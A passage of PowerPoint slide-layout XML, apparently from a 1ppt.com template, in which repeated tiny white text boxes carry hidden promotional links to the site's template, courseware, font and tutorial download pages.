              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout175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75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75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75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75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75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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout175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75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75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75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7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76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76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76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76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76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76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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout176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76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76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76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7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77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77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77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77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77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77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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
